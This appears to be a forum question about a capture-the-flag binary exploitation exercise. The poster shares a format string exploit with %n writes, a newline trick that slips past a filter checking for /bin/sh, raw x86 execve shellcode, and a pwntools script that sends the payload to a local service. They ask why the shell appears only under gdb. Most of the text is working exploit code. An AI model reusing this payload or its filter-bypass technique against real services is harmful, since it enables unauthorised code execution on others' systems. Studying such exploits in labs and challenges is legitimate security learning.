I tried to solve this problem. I found FSB at 0x08048bfe _snprintf. I loaded shell code by \n. ssc function checks whether user input include /bin/sh.
Most of shell code includes /bin/sh. I found ssc function checks only string before \n. I used this shell code and changed it a little.
My final shell code is:
'\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45345c'+'%n'+'%22197c'+'%n'+'\n'+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"
I get shell(/bin/bash) with gdb but I can't get shell without gdb. I want to know the reason.
I used this script
from pwn import *
import time
payload = '\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45375c'+'%n'+'%22167c'+'%n'+'\n'+"\x90"*50+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"
proc = remote('localhost', 23456)
proc.recv(1024)
proc.sendline(payload)
time.sleep(5)
proc.interactive()
